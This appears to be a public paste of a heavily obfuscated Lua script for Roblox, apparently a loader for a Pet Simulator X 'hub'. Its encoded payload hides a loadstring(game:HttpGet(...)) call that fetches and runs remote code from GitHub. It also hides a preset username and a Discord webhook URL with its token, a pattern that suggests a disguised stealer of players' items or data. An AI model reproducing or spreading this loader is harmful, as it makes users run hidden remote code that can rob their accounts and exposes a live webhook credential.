TEXT   81
gdz
Guest on 12th February 2023 11:03:09 AM


 1. --[[
 2.  .____                  ________ ___.    _____                           __                
 3.  |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________
 4.  |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 5.  |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 6.  |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|  
 7.          \/          \/         \/    \/                \/     \/     \/                  
 8.           \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib
 9.  
 10. ]]--
 11.  
 12. do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (4==v0) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (3==v0) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (5==v0) then v16=nil;v16=function(v22,v23,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==0) then v28=1;v29=nil;v22=v5(v4(v22,5),"..",function(v40)if (v2(v40,2)==79) then v29=v1(v4(v40,1,1));return "";else local v83=v3(v1(v40,16));if v29 then local v104=v6(v83,v29);v29=nil;return v104;else return v83;end end end);v30=nil;v27=1;end if (v27==1) then v30=function(v41,v42,v43)if v43 then local v84=(v41/((674 -(666 + 6))^(v42-1)))%(((1488 -(731 + 383)) -(50 + (1702 -(602 + 778))))^(((v43-(1103 -(366 + 736))) -(v42-1)) + 1));return v84-(v84%(1 + 0));else local v85=(4 -(9 -7))^(v42-(913 -(705 + 207)));return (((v41%(v85 + v85))>=v85) and (1 + 0)) or (1065 -(797 + 268));end end;v31=nil;v31=function()local v48=0 -0;local v49;while true do if (v48==(840 -(824 + 15))) then return v49;end if (v48==((248 -143) -(7 + 98))) then v49=v2(v22,v28,v28);v28=v28 + 1;v48=1015 -(81 + 933);end end end;v32=nil;v27=2;end if (3==v27) then v34=function()local v50=v33();local v51=v33();local v52=2 -1;local v53=(v30(v51,1404 -(343 + (1447 -(9 + 378))),57 -37) * ((5 -3)^(56 -(10 + 14)))) + v50;local v54=v30(v51,1172 -(493 + 658),668 -(621 + 16));local v55=((v30(v51,1 + 31)==((1313 + 136) -(161 + 1287))) and  -(1 + 0)) or (1 + 0 + 0);if (v54==(217 -(105 + 112))) then if (v53==0) then return v55 * (0 + 0);else v54=1 -0;v52=0;end elseif (v54==2047) then return ((v53==(0 -(0 + 0))) and (v55 * (1/(0 + 0)))) or (v55 * NaN);end return v9(v55,v54-(419 + 604)) * (v52 + (v53/(2^(39 + 13))));end;v35=nil;v35=function(v44)local v56;if  not v44 then local v86=0 + 0 + 0;while true do if ((976 -(81 + 895))==v86) then v44=v33();if (v44==(1162 -(697 + (1058 -(110 + 483))))) then return "";end break;end end end v56=v4(v22,v28,(v28 + v44) -1);v28=v28 + v44;local v57={};for v76=3 -2, #v56 do v57[v76]=v3(v2(v4(v56,v76,v76)));end return v7(v57);end;v36=v33;v27=4;end if (v27==5) then v39=nil;v39=function(v45,v46,v47)local v58=v45[1];local v59=v45[2];local v60=v45[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v13("#",...) -1;local function v82()local v87=v58;local v88=v59;local v89=v60;local v90=v37;local v91={};local v92={};local v93={};for v97=0 + (1598 -(427 + 1171)),v81 do if ((v97>=v89) or ((96 + 56)>(6011 -(586 + 995)))) then v91[v97-v89]=v80[v97 + 1];else v93[v97]=v80[v97 + (3 -2)];end end local v94=(v81-v89) + (1482 -(693 + (1934 -1146)));local v95;local v96;while true do local v98=0 -0;local v99;while true do if ((v98==(0 + 0)) or ((233 + 829)>(4429 -(631 + 39)))) then v99=0 -0;while true do if (((3463 + 115)<(3501 + 412)) and (v99==(1417 -(1258 + 158)))) then if ((v96<=(3 + 1)) or ((388 -234)>(2914 + 1834))) then if (((1563 -(1013 + 191))==359) and (v96<=(1829 -(840 + 61 + 927)))) then if ((v96>(247 -(33 + 214))) or ((5220 -(679 + 1075))<(597 + (128 -63)))) then v47[v95[6 -3]]=v93[v95[(1002 -(848 + 150)) -2]];else local v121=0 -(0 + 0);local v122;local v123;local v124;while true do if ((v121==0) or ((2224 + (1456 -(436 + 936)))>(5616 -(32 + 238 + 751)))) then v122=0 + (0 -0);v123=nil;v121=1790 -(1664 + 125);end if ((v121==1) or ((4942 -(39 + 83))<=(7646 -(2541 + 772)))) then v124=nil;while true do if (((2143 -(212 + 636))==(2302 -1007)) and (v122==0)) then local v152=776 -(382 + 394);while true do if ((v152==(509 -(247 + 261))) or (2207>=(4598 -2090))) then v122=1 -0;break;end if ((v152==(0 + 0)) or (418==(2438 -1799))) then v123=v95[2];v124=v93[v95[6 -3]];v152=3 -2;end end end if ((v122==1) or ((51 + 43)>(4959 -(89 + 46)))) then v93[v123 + (1866 -(503 + 1362))]=v124;v93[v123]=v124[v95[1558 -(723 + 831)]];break;end end break;end end end elseif ((v96<=(2 + 0)) or (4114==(614 + 4179))) then local v125=477 -(409 + 68);local v126;local v127;local v128;local v129;while true do if (((566 + 480)<(1101 + 3772)) and (v125==(0 + 0))) then local v141=0;while true do if ((1603<=(5217 -(73 + 536))) and (v141==(0 -0))) then v126=v95[1 + (2 -1)];v127,v128=v90(v93[v126](v14(v93,v126 + 1,v95[1748 -(1053 + 692)])));v141=1 + 0;end if ((v141==(1 + 0)) or ((1621 -(878 + 121))==(2373 + 78 + 2478))) then v125=1 + (0 -0);break;end end end if ((2729>((1474 -(372 + 31)) -668)) and (v125==2)) then for v148=v126,v79 do local v149=0;local v150;while true do if ((v149==(1538 -(955 + 583))) or (371>(4801 -(152 + 866)))) then v150=636 -(100 + 536);while true do if ((v150==0) or (2212>2824)) then v129=v129 + (4 -3);v93[v148]=v127[v129];break;end end break;end end end break;end if ((v125==(1 + 0)) or ((605 -378)<(126 + 47))) then local v142=(0 + 0) -0;while true do if ((v142==(3 -2)) or ((48 + 3294)<=(2564 -1014))) then v125=2;break;end if ((v142==(681 -(470 + 211))) or ((4077 -(219 + 18))<=(6063 -4010))) then v79=(v128 + v126) -(586 -(233 + (537 -185)));v129=0 -0;v142=1 + 0;end end end end elseif (((3861 -(1556 + (1796 -(782 + 992))))<3882) and (v96==(3 + 0))) then v93[v95[2 + (0 -0)]]=v95[7 -4];else v93[v95[2 -0]]=v47[v95[1 + 2]];end elseif ((v96<=7) or ((2284 + 1730)<(1130 -426))) then if (((2382 + 172)==(4667 -2113)) and (v96<=(1608 -((432 -210) + 1381)))) then v93[v95[478 -(330 + 146)]][v95[2 + 1]]=v95[1 + 3];elseif ((v96>(165 -(144 + 15))) or (3638<=(2191 -873))) then if ((v93[v95[(132 -(77 + 52)) -1]]==v95[1 + 3]) or ((4121 -(147 + 156))>(7081 -2262))) then v78=v78 + 1;else v78=v95[3];end else v78=v95[1 + 2];end elseif ((((4787 -2579) -((844 -(253 + 58)) + (1469 -(404 + 370))))<=2331) and (v96<=(1226 -(894 + 282 + 42)))) then v93[v95[895 -(560 + 333)]]();elseif ((v96>((496 -(156 + 331)) + 0)) or ((7843 -3130)<=4600)) then local v138=0;local v139;local v140;while true do if ((v138==((2 -1) + 0)) or (817>=(1028 + 877))) then while true do if (((1154 + 2864)>=(498 -249)) and ((438 -(379 + 59))==v139)) then v140=v95[595 -((1775 -(1340 + 122)) + 280)];v93[v140]=v93[v140](v14(v93,v140 + (678 -(505 + 172)),v79));break;end end break;end if (((729 + (3891 -2111))<2594) and (v138==(0 + 0))) then v139=0;v140=nil;v138=(1 -0) -0;end end else do return;end end v78=v78 + 1 + (1681 -(1159 + 522));break;end if (((0 -(0 + 0))==v99) or ((1966 + 2008)==(4928 -(382 + 80)))) then v95=v87[v78];v96=v95[1 + 0];v99=1;end end break;end end end end A,B=v37(v12(v82));if  not A[1] then local v100=v45[4][v78] or "?";error("Script error at ["   .. v100   .. "]:"   .. A[2]);else return v14(A,2,B);end end;end;return v39(v38(),{},v23)(...);end if (2==v27) then v32=function()local v61,v62=v2(v22,v28,v28 + (557 -(91 + 464)));v28=v28 + (5 -3);return (v62 * (186 + 70)) + v61;end;v33=nil;v33=function()local v63,v64,v65,v66=v2(v22,v28,v28 + (751 -(410 + (1024 -(468 + 218)))));v28=v28 + 1 + 3;return (v66 * (32836344 -16059128)) + (v65 * (61777 + 3759)) + (v64 * ((1435 -(210 + 888)) -(62 + 19))) + v63;end;v34=nil;v27=3;end if (v27==4) then v37=nil;v37=function(...)return {...},v13("#",...);end;v38=nil;v38=function()local v67=0;local v68;local v69;local v70;local v71;local v72;local v73;local v74;local v75;while true do if (v67==1) then local v101=0;while true do if (v101==(0 + 0)) then v70=nil;v71=nil;v101=804 -(166 + 637);end if (v101==(1 + 0)) then v67=2;break;end end end if (v67==(0 + 0)) then local v102=0;while true do if (v102==(1464 -(1311 + 152))) then v67=1;break;end if ((0 + 0)~=v102) then else v68=0;v69=nil;v102=1;end end end if (v67==2) then local v103=0;while true do if (v103==1) then v67=3;break;end if ((0 -0)==v103) then v72=nil;v73=nil;v103=1 + 0;end end end if (3==v67) then v74=nil;v75=nil;v67=4 -0;end if (v67==(10 -6)) then while true do if (v68==(0 -0)) then v69=0;v70=nil;v68=1747 -(350 + 1396);end if (v68~=(34 -(23 + 8))) then else v75=nil;while true do local v113=207 -(129 + 78);local v114;local v115;while true do if (v113==1) then while true do if (v114~=0) then else v115=0;while true do if ((1236 -(717 + 518))==v115) then if (0==v69) then local v143=0;local v144;local v145;while true do if (1==v143) then while true do if (v144==0) then v145=0;while true do if (v145~=(0 + 0)) then else v70={};v71={};v145=1 -0;end if (1~=v145) then else v72={};v69=1;break;end end break;end end break;end if (v143~=(0 + 0)) then else v144=0;v145=nil;v143=1 + 0;end end end if (2==v69) then local v146=423 -(416 + 7);local v147;while true do if (v146~=0) then else v147=0;while true do if ((807 -(610 + 197))==v147) then local v165=0;while true do if (v165==(1668 -(562 + 1105))) then v147=1 + 0;break;end if (v165==0) then for v176=1,v74 do local v177=0;local v178;local v179;local v180;while true do if (v177==(0 + 0)) then local v183=0 + 0;while true do if (v183~=0) then else v178=1478 -(1173 + 305);v179=nil;v183=1;end if (v183==1) then v177=1;break;end end end if (v177~=1) then else v180=nil;while true do if (v178~=(541 -(469 + 71))) then else if (v179==1) then v180=v31()~=(1361 -(847 + 514));elseif (v179==(1418 -(1049 + 367))) then v180=v34();elseif (v179==(3 + 0)) then v180=v35();end v75[v176]=v180;break;end if ((952 -(157 + 795))==v178) then local v192=0 -0;local v193;while true do if (v192==(0 -0)) then v193=110 -(73 + 37);while true do if (v193~=(1 + 0)) then else v178=393 -(284 + 108);break;end if (v193==0) then local v197=1561 -(981 + 580);while true do if (v197~=1) then else v193=1;break;end if (v197~=0) then else v179=v31();v180=nil;v197=1;end end end end break;end end end end break;end end end v73[1784 -(1365 + 416)]=v31();v165=1;end end end if (v147==(1 + 0)) then for v168=1,v33() do local v169=0;local v170;local v171;while true do if (0~=v169) then else v170=0;v171=nil;v169=1;end if (v169~=(195 -(4 + 190))) then else while true do if (v170~=0) then else v171=v31();if (v30(v171,1,1)==0) then local v184=0 + 0;local v185;local v186;local v187;local v188;local v189;while true do if (v184==1) then v187=nil;v188=nil;v184=5 -3;end if (v184~=(1164 -(448 + 716))) then else v185=1398 -(423 + 975);v186=nil;v184=304 -(34 + 269);end if (v184==2) then v189=nil;while true do if (v185~=1) then else local v195=0;while true do if (v195==(0 + 0)) then v188=nil;v189=nil;v195=1;end if ((903 -(467 + 435))~=v195) then else v185=5 -3;break;end end end if (v185~=2) then else while true do if (0==v186) then local v202=1443 -(446 + 997);while true do if (v202==0) then v187=v30(v171,2,3);v188=v30(v171,2 + 2,22 -16);v202=1;end if (v202==(1 + 0)) then v186=1;break;end end end if (v186==1) then v189={v32(),v32(),nil,nil};if (v187==0) then local v205=0 -0;while true do if (v205==0) then v189[1924 -(200 + 1721)]=v32();v189[6 -2]=v32();break;end end elseif (v187==1) then v189[1 + 2]=v33();elseif (v187==2) then v189[3]=v33() -((6 -4)^(77 -61));elseif (v187==(517 -(174 + 340))) then local v216=0;local v217;while true do if ((1685 -(419 + 1266))==v216) then v217=0 + 0;while true do if (v217==0) then v189[3]=v33() -((800 -(171 + 627))^16);v189[5 -1]=v32();break;end end break;end end end v186=1487 -(912 + 573);end if ((2 + 1)==v186) then if (v30(v188,1 + 2,3)~=(1799 -(1079 + 719))) then else v189[4]=v75[v189[4]];end v70[v168]=v189;break;end if (v186==(2 + 0)) then local v204=0 -0;while true do if (v204==0) then if (v30(v188,1 + 0,1 -0)==(1 + 0)) then v189[5 -3]=v75[v189[2]];end if (v30(v188,7 -5,548 -(392 + 154))~=1) then else v189[936 -(320 + 613)]=v75[v189[374 -(153 + 218)]];end v204=1;end if (v204==1) then v186=1692 -(1636 + 53);break;end end end end break;end if (v185==(1376 -(1336 + 40))) then local v196=0;while true do if (v196~=0) then else v186=0 -0;v187=nil;v196=1;end if (v196==(3 -2)) then v185=1;break;end end end end break;end end end break;end end break;end end end v69=3;break;end end break;end end end break;end if (v115~=(674 -(507 + 167))) then else local v132=0;while true do if (v132==(1 -0)) then v115=201 -(102 + 98);break;end if (v132==(0 + 0)) then if (v69==(1 + 0)) then local v157=0;local v158;while true do if ((0 -0)==v157) then v158=0;while true do if ((0 -0)==v158) then local v174=0 -0;local v175;while true do if (v174==(0 + 0)) then v175=0;while true do if (v175==1) then v158=1 + 0;break;end if (v175~=0) then else local v190=0 + 0;while true do if (v190==0) then v73={v70,v71,nil,v72};v74=v33();v190=1;end if (v190==1) then v175=1;break;end end end end break;end end end if (v158~=1) then else v75={};v69=2;break;end end break;end end end if (v69~=3) then else local v159=0;local v160;while true do if (v159==0) then v160=1039 -(15 + 1024);while true do local v172=0 + 0;while true do if (v172==(0 + 0)) then if ((0 + 0)~=v160) then else local v181=0;local v182;while true do if (v181==0) then v182=0 + 0;while true do if ((900 -(795 + 104))==v182) then v160=1284 -(836 + 447);break;end if (v182==0) then local v194=0;while true do if (v194==1) then v182=1 + 0;break;end if (v194==0) then for v198=1,v33() do v71[v198-(1 + 0)]=v38();end for v200=1 + 0,v33() do v72[v200]=v33();end v194=1 + 0;end end end end break;end end end if (v160~=1) then else return v73;end break;end end end break;end end end v132=1 + 0;end end end end break;end end break;end if (v113~=(0 + 0)) then else v114=0 -0;v115=nil;v113=1;end end end break;end if (v68==2) then local v109=0;local v110;while true do if (v109==(847 -(654 + 193))) then v110=0;while true do if (v110~=1) then else v68=7 -4;break;end if (v110~=0) then else local v118=0;while true do if (0~=v118) then else v73=nil;v74=nil;v118=1;end if (v118==(1 + 0)) then v110=3 -2;break;end end end end break;end end end if (v68==1) then local v111=0;local v112;while true do if (v111~=(370 -(86 + 284))) then else v112=0 + 0;while true do if (v112==0) then v71=nil;v72=nil;v112=2 -1;end if (v112~=(1 + 0)) then else v68=2;break;end end break;end end end end break;end end end;v27=5;end end end;v16("LOL!173O00028O00026O00084003023O005F4703053O00546578743403133O005374617274696E6720536372697074733O2E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782O322F6D61696E2F70657473696D6775692O732E6C756103083O00557365726E616D65030D3O003O785F544845626F7935363703073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31303734323833353334323O3638333532342F49663045726A4633525951584F66577065465A5267344F2D6E7579316A766E394D713745554B49434F5154583666424B73576C6865596B44496A566737784C3343714179026O00F03F03103O00437573746F6D5363726970744E616D6503083O00436F656E2048756203053O00546578743103103O00536372697074204C6F616465643O2E027O004003053O00546578743203123O0057616974696E6720666F722053637269707403053O00546578743303133O00436865636B696E6720536372697074733O2E00243O0012033O00013O0026073O000D000100020004063O000D0001001204000100033O003005000100040005001204000100063O001204000200073O00202O000200020008001203000400094O0002000200044O000A00013O00022O00080001000100010004063O002300010026073O0014000100010004063O001400010012030001000B3O0012010001000A3O0012030001000D3O0012010001000C3O0012033O000E3O0026073O001B0001000E0004063O001B0001001204000100033O0030050001000F0010001204000100033O0030050001001100120012033O00133O0026073O0001000100130004063O00010001001204000100033O003005000100140015001204000100033O0030050001001600170012033O00023O0004063O000100012O00093O00017O00243O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00093O00093O000A3O000A3O000B3O000B3O000C3O000E3O000E3O000F3O000F3O00103O00103O00113O00133O00133O00143O00143O00153O00153O00163O00173O00193O00",v10(),...);break;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end end end

Raw Paste

Login or Register to edit or fork this paste. It's free.